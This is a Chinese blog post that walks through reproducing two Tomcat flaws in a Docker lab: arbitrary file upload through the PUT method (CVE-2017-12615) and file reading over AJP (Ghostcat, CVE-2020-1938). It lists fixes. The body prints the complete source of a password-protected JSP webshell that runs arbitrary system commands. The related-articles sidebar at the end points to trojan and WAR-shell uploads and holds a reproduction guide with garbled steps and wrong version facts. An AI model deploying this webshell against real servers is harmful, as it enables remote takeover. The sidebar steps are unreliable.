Tomcat PUT方法任意写文件漏洞和Tomcat-Ajp漏洞(CVE-2017-12615/CVE-2020-1938)漏洞复现

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量862 收藏 3
点赞数 8
分类专栏: 漏洞复现 文章标签: tomcat servlet 漏洞复现 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571759/article/details/105580548
版权

文章目录

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

Tomcat版本:8.5.19

PUT方法

  • 除常用的GET和POST方法外还包括和GET请求类似的HEAD请求,TRACE和OPTIONS请求,以及这里的PUT请求方法;

  • PUT请求方法试图使用包含在请求主体的内容,向服务器上传指定的资源。如果能激活这个方法就可以用它来攻击应用程序。

漏洞环境搭建

  1. 使用docker进入环境所在目录并拉取镜像到仓库运行

在这里插入图片描述

  1. 进入bash环境
docker exec -it 8afe1f5de9a6 /bin/bash

进入容器的bash环境,查看

cat /usr/local/tomcat/conf/web.xml

漏洞成因

在这里插入图片描述

其中配置了readonly=false,导致我们可以往服务器写文件

漏洞复现

进入tomcat的漏洞环境,进行抓包发送到reapeater模块构造

在这里插入图片描述

进入tomcat的主目录/usr/local/tomcat/webapps/ROOT中查看是否上传成功

在这里插入图片描述

显示没毛病,上传成功了,接下来就是研究上传的脚本了,怎样实现远程命令执行,对java不是很熟,学习了一下稍微注释了一些

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
//设置页面编码格式,导入java包
<%!
public static String excuteCmd(String c)
        {
        StringBuilder line = new StringBuilder();
        //StringBuilder一个类
        try
        {


        Process pro = Runtime.getRuntime().exec(c);
        //调用另一个的可执行程序或系统命令,cmd 是字符串类型 也可以是字符串类型的数组 内容就是 命令行
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        //把字符流添加到缓冲流
        String temp = null;
        //值初始化为null


        while ((temp = buf.readLine()) != null)
        
        {


        line.append(temp+"\\n");
        }
        buf.close();
        //append追加字符串,然后关闭资源
        }


        catch (Exception e)


        {
        line.append(e.getMessage());
        }


        return line.toString();


        }
        %>


<%


        if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
        //request.getParameter参数的取值,


        {
        out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
        }


        else
        {
        out.println(":-)");
        //输出打印笑脸
        }
        %>

所以这里给cmd赋值一个命令行的命令就应该能实现远程执行
在这里插入图片描述

漏洞解决方法

由于存在去掉最后的 / 的特性,最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true。

Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现

漏洞详情

2月14日,Apache Tomcat 官方发布安全更新版本,修复漏洞。2月20日,国家信息安全漏洞共享平台(CNVD)发布安全公告,该漏洞综合评级为高危,漏洞 CVE 编号 CVE-2020-1938。

漏洞危害

   攻击者可以读取 Tomcat下部署的所有webapp目录下的任意文件。
    此外如果网站应用提供文件上传的功能,攻击者可以先向服务端上传一个内容含有恶意JsP脚本代码的文件(上传的文件本身可以是任意类型的文件,比如图片、纯文本文件等),然后利用Ghostcat漏洞进行文件包含,从而达到代码执行的危害。

【版本影响】

  • Apache Tomcat 9.x<9.0.31
  • Apache Tomcat 8.X <8.5.51
  • Apache Tomcat 7.x<7.0.100
  • Apache Tomcat 6.x

最近有个关于tomcat的漏洞文件包含的漏洞,就顺便复现一下,以上资料也是网上查的;

漏洞复现

查看刚刚用于复现的tomcat版本号是否会受影响

在这里插入图片描述

版本号符合要求,进入容器

查看一下配置cat /usr/local/tomcat/conf/server.xml

在这里插入图片描述

8009以及AJP协议开放,说明存在其漏洞,从网上下载了poc进行漏洞复现,但是现在运行会报错

在这里插入图片描述

我原本单纯的以为8009端口应该会开放着但是并没有

在这里插入图片描述

所以这里需要将之前的容器关掉,指定容器开放8009端口再进行复现

docker stop 镜像id
docker run -d -p 8080:8080 -p 8009:8009 3053aee7bf96
docker ps查看正在运行的容器

进入容器的bash环境 docker exec it “id”/bin/bash

然后再检查一下8009端口是否已经开启

在这里插入图片描述
此时已经开启8009端口,使用poc读取web.xml文件,如图

读取成功

在这里插入图片描述

自行创建一个文件123.txt,检查是否能读取

在这里插入图片描述

在这里插入图片描述

同样也能读取

解决方案

  • 禁用AJP协议端口
  • 配置ajp配置中的secretRequired跟secret属性来限制认证
humble嘻
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Tomcat 通过 PUT 方法任意文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1090
CVE-2017-12615 对应的漏洞任意文件入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了权限(readonly=false),导致可以使用PUT方法上传任意文件
TomcatPUT的上传漏洞(CVE-2017-12615)
小小猪的博客
11-19 3621
Tomcat远程代码执行漏洞(CVE-2017-12615) 漏洞描述: 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 受影响的版本: Apache Tomcat 7.0.0 to 7.0.79 利用条件: Apache
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1393
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
Tomcat 又爆出高危漏洞Tomcat 8.5 ~ 10 中招…
芒果不是程序猿v:lemon-hanwa 的博客
12-10 2745
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。 不要使用含有漏洞的组件每次也都被评为 OWASP 10 大安全漏洞之一。 光这半年以来,所知道的就有 Dubbo、FastJSON、Tomcat: 前段时间这个 Tomcat AJP 协议漏洞大开,2020/06/25 这天 Tomcat 又爆出 HTTP/2 拒绝服务漏洞: http://mail-archives.apache.org/mod_
Apache Tomcat 安全漏洞(CVE-2020-13935)
qq_40640917的博客
01-20 1万+
漏洞详情: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 影响版本: 10.0.0-M1版本至10.0.0-M6版本 9.0.0.M1版本至9.0.36版本 8.5.0版本至8.5.56版本 7.0.27版本至7.0.104版本
tomcat tomcat8漏洞
2301_76467680的博客
07-03 254
制作WAR包,将JSP木马压缩为ZIP格式,然后修改后缀为war就可以了。拼接/manager/html。
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
# CVE-2020-1938 Apache Tomcat 文件包含 影响版本: Tomcat6-9 Exp: ``` python CNVD-2020-10487-Tomcat-Ajp-lfi.py x.x.x.x -p 8009 -f urfile 一. 漏洞概述 2月20日,国家信息安全漏洞共享平台(CNVD)...
CVE-2020-1938.zip
04-15
CVE-2020-1938:Apache Tomcat AJP协议远程代码执行漏洞CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞,该漏洞允许攻击者通过AJP(Apache JServ Protocol)接口来实远程代码执行,从而对目标系统...
apache-tomcat-7.0.109版本
09-23
CVE-2020-1938是2020年公开的一个严重安全漏洞,被称为“Tomcat AJP协议远程代码执行漏洞”。该漏洞存在于Apache Tomcat的AJP/1.3协议处理中,攻击者可以利用这个漏洞在受影响的服务器上执行任意代码,从而获取...
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
tomcat 漏洞集合
qq_53229503的博客
09-02 7221
tomcat 漏洞集合
pack.json中的~和^的区别
jiayang_Sir的博客
10-12 794
在pack.json文件中版本说明前面还有个符号:^(插入符号)和 ~(波浪符号),他们之间的区别: 例如: ~(波浪符号): 他会更新到当前小版本的中最新的版本。例如:"crypto-js":"~3.1.9-1",这个库会去匹配更新到3.1.x的最新版本,如果出了一个新的版本为3.2.0,则不会自动升级 ^(插入符号): )他会更新到当前大版本的中最新的版本。例如:"moment":"^2.24.0",, 这个库会去匹配更新到2.x.x中最新的版本,但是他不会自动更新到3.0.0 都不填...
tomcat8 后台getshell漏洞
weixin_54786196的博客
09-03 264
打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。
Tomcat PUT方法任意文件漏洞CVE-2017-12615)
SoulCat
01-29 3460
Tomcat PUT方法任意文件漏洞CVE-2017-12615) 漏洞概述: 如果Tomcat开启了PUT方法(默认关闭,有点鸡肋,但是有些页面需要PUT,无法关闭),则有可能存在远程命令执行漏洞,攻击者可以利用PUT方法上传jsp文件,从而造成远程命令执行,getshell等。 漏洞版本: 7.0.0~7.0.79 漏洞搭建: 利用vulhub漏洞平台(简单粗暴,一键生成漏洞!)...
TomcatPUT的上传漏洞(CVE-2017-12615)
Fly_鹏程万里
10-30 5288
近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理。用作来巩固更新自己的知识库。 首先我们先来了解以下Tomcat的概念: Tomcat是我们在工作中所使用的一款开源轻量级的Web应用程序服务器。通常情况下在中小型系统或者并发量较小的场合下使用,常用来与JSP和PHP脚本结合使来解析脚本语...
WEB安全:Tomcat-Ajp协议漏洞分析
墨痕诉清风的博客
02-20 1万+
tomcat在接收ajp请求的时候调用org.apache.coyote.ajp.AjpProcessor来处理ajp消息,prepareRequest将ajp里面的内容取出来设置成request对象的Attribute属性。然后再通过控制ajp控制的上述三个属性来读取文件,通过操控上述三个属性从而可以读取到/WEB-INF下面的所有敏感文件,不限于class、xml、jar等文件。详见https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html。
Tomcat任意文件上传漏洞CVE-2017-12615测试
热门推荐
黑面狐
09-20 3万+
今天爆出了一个tomcat7的任意文件上传漏洞,看了大牛们的分析后,我自己本地搭建环境测。 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 我本地下载的是tomcat7.0.56版本测试 测试过程: 1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false 如图: 然后启动tom
Tomact_CVE-2020-1938漏洞
08-31
Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 漏洞:使用以下命令触发漏洞: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值